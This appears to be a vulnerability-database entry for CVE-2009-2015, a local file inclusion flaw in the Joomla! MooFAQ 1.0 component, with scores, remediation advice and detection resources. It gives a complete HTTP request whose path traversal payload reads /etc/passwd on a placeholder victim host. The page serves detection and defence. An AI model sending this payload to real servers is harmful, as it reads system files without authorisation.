🔙 목록으로 돌아가기

CVE-2009-2015: Joomla! MooFAQ 1.0 - Local File Inclusion

TitleJoomla! MooFAQ 1.0 - Local File Inclusion
Authordaffainfo
SeverityHigh
ImpactThe vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, information disclosure.
RemediationUpdate Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor.
CVSS Score7.5
EPSS Score0.02124
CVE IDCVE-2009-2015
CWE IDCWE-22
Tags cve cve2009 joomla lfi edb vuln

🔍 Vulnerability Description

Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).

🌐 HTTP Request

GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2009/CVE-2009-2015.yaml

🦈 Packet Capture: ⬇️ Download cve-2009-2015.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A